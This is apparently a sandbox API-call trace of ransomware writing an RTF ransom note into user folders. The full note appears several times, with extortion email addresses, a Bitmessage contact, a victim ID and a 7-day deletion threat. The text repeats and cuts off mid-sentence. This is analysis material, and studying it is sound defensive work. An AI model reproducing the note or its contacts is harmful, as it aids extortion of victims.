p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.132] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.133] CloseHandle (hObject=0x294) returned 1 [0285.133] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0285.133] GetLastError () returned 0x2 [0285.133] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.134] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link 